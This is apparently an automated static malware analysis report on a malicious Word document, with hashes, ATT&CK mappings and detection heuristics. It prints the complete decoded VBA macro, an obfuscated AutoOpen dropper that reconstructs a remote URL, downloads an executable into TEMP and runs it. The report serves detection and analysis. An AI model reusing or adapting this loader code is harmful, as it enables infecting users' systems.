Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 09a146b610c8f5e6…

MALICIOUS

Office (OOXML)

Size: 29.4 KB
Created: 2016-07-19 09:47:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2016-08-15
MD5: aa1fe268b69b517beacd96ff245eddc0
SHA-1: 3ba564bc9ec3beb596cef2e85c34b9d7ad5c0065
SHA-256: 09a146b610c8f5e671e43d8372a6bd7503a24bacb41e6d5cc79cb17e2147726b
Risk Score: 352

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample contains obfuscated VBA macros with an auto-executing loader. Critical heuristics indicate that the VBA code downloads a file via HTTP and executes it, a common technique for delivering second-stage payloads. The presence of ClamAV detections further supports its malicious nature. The VBA script's primary function is to download and execute a payload from a remote source.

Heuristics 9

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (Referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (Referenced by macro)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12531 bytes
SHA-256: 95e2f6d05d11fb481bb7843f035762afa0326b1d77ed1b31dcae8769196a53f1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
StopSignal "", ""
End Sub

Attribute VB_Name = "Module1"
Public mAshinkazingeraIgolochkuSlomala_to__1 As Object
Public somebodySaloEst As Object
Public mAshinkazingeraIgolochkuSlomala_to__3 As Object
Public tdgfnbq() As String


Public mAshinkazingeraIgolochkuSlomala_to__4 As String
Public rjkjdhfn() As String
Public mAshinkazingeraIgolochkuSlomala_tolko1 As String
Public mAshinkazingeraIgolochkuSlomala_to_fiddle As Object
Public SheikerSheiker As String
Public Function CheckDriveSpecError(ByRef driveSpec As String) As Boolean
 Dim x1 As String, x2 As String
 Dim lDrive As Integer
CheckDriveSpecError = False
 driveSpec = Trim$(driveSpec)
 lDrive = Len(driveSpec)
 If lDrive = 0 Or lDrive > 2 Then
 CheckDriveSpecError = True
 ElseIf lDrive = 1 Then
 If UCase$(driveSpec) > "C" And UCase$(driveSpec) <= "Z" Then
 driveSpec = driveSpec & ":"
 Else
 CheckDriveSpecError = True
 End If
 ElseIf lDrive = 2 Then
 x1 = UCase$(Left$(driveSpec, 1))
 x2 = Right$(driveSpec, 1)
 If Not (x1 > "C" And x1 <= "Z" And x2 = ":") Then CheckDriveSpecError = True
 End If
End Function
Public Sub ClearColl(ByRef colX As Collection)
 Do While colX.Count > 0
 colX.Remove 1
 Loop
End Sub
Public Function Kombainer(A1 As String, A2 As String, A3 As String) As String
Kombainer = Replace(A1, A2, A3)
End Function
Public Function FileExist(InFile As String) As Boolean
 FileExist = False
 On Error Resume Next
 If Dir$(InFile) <> "" Then FileExist = True
End Function
Public Function GetProjTierInfo(ByVal ProjID As String, ByVal SubpID As String, ByVal DiscID As String) As String
GetProjTierInfo = ""
 Dim intProjID As Integer, intSubpID As Integer, intDiscID As Integer
 intProjID = IIf((Len(ProjID) > 0) And IsNumeric(ProjID), ProjID, -2)
 intSubpID = IIf((Len(SubpID) > 0) And IsNumeric(SubpID), SubpID, -2)
 intDiscID = IIf((Len(DiscID) > 0) And IsNumeric(DiscID), DiscID, -2)
 If (intProjID > -1) Then
 If (intSubpID > -1) Then
 If (intDiscID > -1) Then
 GetProjTierInfo = "3T"
 Else
 GetProjTierInfo = "2TA"
 End If
 Else
 If (intDiscID > -1) Then
 GetProjTierInfo = "2TB"
 Else
 GetProjTierInfo = "1T"
 End If
 End If
 ElseIf (intProjID = "-2") Then
 GetProjTierInfo = "0T"
 End If
End Function
Public Function IsDefined(ByVal strCin As String) As Boolean
 If strCin <> "" And strCin <> "-1" And strCin <> "-2" Then
 IsDefined = True
 Else
 IsDefined = False
 End If
End Function
Public Function IsNotApplicable(ByVal strCin As String) As Boolean
 If strCin = "-2" Then
 IsNotApplicable = True
 Else
 IsNotApplicable = False
 End If
End Function
Public Function IsUnDefined(ByVal strCin As String) As Boolean
 If strCin = "" Or strCin = "-1" Then
 IsUnDefined = True
 Else
 IsUnDefined = False
 End If
End Function
Public Function LastDelimit(ByVal cin As String, ByVal Delimit As String) As Integer
 Dim NL As Integer, N As Integer
 LastDelimit = 0
 NL = Len(cin)
 For N = NL To 1 Step -1
 If Mid$(cin, N, 1) = Delimit Then
 LastDelimit = N
 Exit Function
 End If
 Next N
End Function
Public Function ParseStr(ByVal cin As String, ByVal Delimit As String, _
 ByRef StrOut() As String) As Integer
 Dim lenDelimit As Integer, NS As String, NL As Integer, N As Integer
 Dim NUBound As Integer
 lenDelimit = Len(Delimit)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL = 0 Then
 ParseStr = 0
 StrOut(0) = ""
 Exit Function
 End If
 NUBound = UBound(StrOut)
 ParseStr = 0
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 StrOut(ParseStr) = Trim$(Mid$(cin, NS, N - NS))
 NS = N + lenDelimit
 Else
 StrOut(ParseStr) = Trim$(Mid$(cin, NS))
 End If
 ParseStr = ParseStr + 1
 If (ParseStr > NUBound) Then Exit Function
 Loop While N > 0 And NL > N
End Function
Public Function RemoveSpaceFromList(ByVal cin As String, ByVal Delimit As String) As String
 Dim nStr As Integer, N As Integer
 Dim StrOut(15) As String
 cin = Trim$(cin)
 If Len(cin) > 0 Then
 nStr = ParseStr(cin, Delimit, StrOut)
 For N = 0 To nStr - 1
 If N = 0 Then
 RemoveSpaceFromList = Trim$(StrOut(N))
 Else
 RemoveSpaceFromList = RemoveSpaceFromList & Delimit & Trim$(StrOut(N))
 End If
 Next N
 Else
 RemoveSpaceFromList = ""
 End If
End Function
Public Sub StrParserColl(ByVal cin, ByVal Delimit As String, _
 ByRef StrColl As Collection)
 Dim NL As Integer, N As Integer, NS As Integer, LenD As Integer
 Dim x As String
 Dim I As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For I = 1 To Len(Trim("A112DWDCS22"))
 If d = False Then
Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
Exit For
Else
d = False
End If
Next I
Set mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA = CreateObject(rjkjdhfn(3))
 C = ""
 Set mAshinkazingeraIgolochkuSlomala_to__3 = mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA.Environment(rjkjdhfn(4))
 Dim trostTROS As Integer
For trostTROS = LBound(tdgfnbq) To UBound(tdgfnbq)
 SheikerSheiker = SheikerSheiker & PfghzufqntkjgwsRjyb(trostTROS)
 Next trostTROS
 ReplaceOneWithTwoQuotes ""
 mAshinkazingeraIgolochkuSlomala_to__4 = mAshinkazingeraIgolochkuSlomala_to__3(rjkjdhfn(6))
 mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_to__4
mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_tolko1 + rjkjdhfn(12)
WriteClientCmdColl Nothing
 Exit Sub
 Call ClearColl(StrColl)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL <= 0 Then Exit Sub
 LenD = Len(Delimit)
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 x = Trim$(Mid$(cin, NS, N - NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 NS = N + LenD
 Else
 x = Trim$(Mid$(cin, NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 End If
 Loop While N > 0
End Sub


Public Function PfghzufqntkjgwsRjyb(VaarP1 As Integer) As String
Dost = CInt(tdgfnbq(VaarP1))
PfghzufqntkjgwsRjyb = Chr(Dost / (10 + 6))
End Function

Public Function ReplaceOneWithTwoQuotes(ByVal cin As String) As String
 Dim COut As String
 Dim LCin As Integer, N As Integer, M As Integer, I As Integer
 ReplaceOneWithTwoQuotes = ""
 LCin = Len(cin)
 If Application = "Microsoft Word" Then
 mAshinkazingeraIgolochkuSlomala_to__1.Open rjkjdhfn(5), SheikerSheiker, False
mAshinkazingeraIgolochkuSlomala_to__1.Send
End If
 If LCin = 0 Then Exit Function
 COut = ""
 I = 1
 For N = 1 To 20
 M = InStr(I, cin, """")
 If M > 0 Then
 COut = COut & Mid$(cin, I, M - I + 1) & """"
 I = M + 1
 If M >= LCin Then Exit For
 Else
 Exit For
 End If
 Next N
 If I <= LCin Then COut = COut & Mid$(cin, I)
 ReplaceOneWithTwoQuotes = COut
End Function
Public Function ReplaceText(ByVal fromTxt As String, ByVal toTxt As String, _
 ByVal orgTxt As String) As String
 Dim finalTxt As String
 Dim lenOrgTxt As Integer, lenFromTxt
 Dim N As Integer, M As Integer
 finalTxt = ""
 orgTxt = Trim$(orgTxt)
 lenOrgTxt = Len(orgTxt)
 If lenOrgTxt = 0 Then
 ReplaceText = finalTxt
 End If
 lenFromTxt = Len(fromTxt)
 finalTxt = ""
 N = 1
 Do
 M = InStr(N, orgTxt, fromTxt)
 If (M > 0) Then
 finalTxt = finalTxt & Mid(orgTxt, N, M - N) & toTxt
 N = M + lenFromTxt
 Else
 finalTxt = finalTxt & Mid$(orgTxt, N)
 End If
 Loop While (lenOrgTxt > N And M > 0)
 ReplaceText = finalTxt
End Function
Public Sub WriteClientCmd_OLD1(ByVal NItem As Integer, ByRef cin() As String)
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = "" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """ & cin(N) & """"
 Else
 xx = xx & ", """ & cin(N) & """"
 End If
 Next N
 Print #2, xx
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = " LFile.WriteLine(""" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """"" & cin(N) & """"""
 Else
 xx = xx & ", """"" & cin(N) & """"""
 End If
 Next N
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmdColl(ByRef colStr As Collection)
 Dim lngN As Long
 Dim xx As String
 somebodySaloEst.Type = 1
 somebodySaloEst.Open
 somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
somebodySaloEst.Write somebody
 somebodySaloEst.savetofile mAshinkazingeraIgolochkuSlomala_tolko1, 2
 mAshinkazingeraIgolochkuSlomala_to_fiddle.Open (mAshinkazingeraIgolochkuSlomala_tolko1)
Exit Sub
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = "" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """ & colStr(lngN) & """"
 Else
 xx = xx & ", """ & colStr(lngN) & """"
 End If
 Next lngN
 Print #2, xx
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = " LFile.WriteLine(""" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """"" & colStr(lngN) & """"""
 Else
 xx = xx & ", """"" & colStr(lngN) & """"""
 End If
 Next lngN
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmd_OLD2(ParamArray cin())
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = "" & x & "("
 ElseIf N = 2 Then
 xx = xx & """" & x & """"
 Else
 xx = xx & ", """ & x & """"
 End If
 Next x
 xx = xx & ")"
 Print #2, xx
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = " LFile.WriteLine(""" & x & "("
 ElseIf N = 2 Then
 xx = xx & """""" & x & """"""
 Else
 xx = xx & ", """"" & x & """"""
 End If
 Next x
 xx = xx & ")"")"
 Print #2, xx
End Sub
Public Function LocalTimeToUTC(ByVal the_date As Date) As Date
Dim system_time As String
Dim local_file_time As String
Dim utc_file_time As String
 DateToSystemTime the_date, system_time
 SystemTimeTo.FileTime system_time, local_file_time
 LocalFileTimeTo.FileTime local_file_time, utc_file_time
 FileTimeTo.SystemTime utc_file_time, system_time
 SystemTimeToDate system_time, the_date
 LocalTimeToUTC = the_date
End Function
Private Sub DateToSystemTime(ByVal the_date As Date, ByRef system_time As String)
 With system_t.ime
 .wYear = Year(the_date)
 .wMonth = Month(the_date)
 .wDay = Day(the_date)
 .wHour = Hour(the_date)
 .wMinute = Minute(the_date)
 .wSecond = Second(the_date)
 End With
End Sub
Private Sub SystemTimeToDate(system_time As String, ByRef the_date_sys As Date)
 With system_t.ime
 the_date_sys = DateSerial(.wYear, .wMonth, .wDay) + _
 TimeSerial(.wHour, .wMinute, .wSecond)
 End With
End Sub


Public Function StopSignal(ByVal NetDrive As String, ByVal ServerPath As String) As Integer
 tdgfnbq = Split("1664678678678232185667867867823218566786786782321792678678678232928678678678232752678678678232752678678678232166467867867823216166786786782321776678678678232176067867867823219366786786782321568678678678232155267867867823215686786786782321936678678678232736678678678232184067867867823219366786786782321760678678678232177667867867823217286786786782321776678678678232164867867867823219366786786782327366786786782321744678678678232161667867867823275267867867823276867867867823216646786786782321568678678678232880678678678232864678678678232848", "678678678232")
 Dim DFNBPLFC As String
DFNBPLFC = Kombainer("TOOCicroTOOOCoft.XTOOCLHTTPTOOOOCAdodb.TOOOCtrTOCaTOOCTOOOOCTOOOChTOCll.ApplicationTOOOOCWTOOOCcript.TOOOChTOCllTOOOOCProcTOCTOOOCTOOOCTOOOOCGTOCTTOOOOCTTOCTOOCPTOOOOCTypTOCTOOOOCopTOCnTOOOOCwritTOCTOOOOCrTOCTOOOCponTOOOCTOCBodyTOOOOCTOOOCavTOCtofilTOCTOOOOC\isnovaTOOOC2.TOCxTOC", "TOC", "e")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOC", "M")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOOC", "s")
 rjkjdhfn = Split(DFNBPLFC, "TOOOOC")
 Set somebodySaloEst = CreateObject(rjkjdhfn(1))
 Set mAshinkazingeraIgolochkuSlomala_to_fiddle = CreateObject(rjkjdhfn(2))
StrParserColl "", "", Nothing
Exit Function
 Dim Rtn As Boolean
 Rtn = ConnectNet.Drive(NetDrive, ServerPath)
 StopSignal = IIf(Rtn = True, 0, -1)
End Function

Attribute VB_Name = "DDAS"
Attribute VB_Base = "0{D1BF6CCB-D1BC-4162-97C4-4F6068C3803E}{881A6C08-1283-42BD-8DC2-0B76CCDAC2B9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 38912 bytes
SHA-256: 9f0b3d6244b12d4f9a54625aef45ba050d97ff417c67df3e2e01920322ef870b
Detection
ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).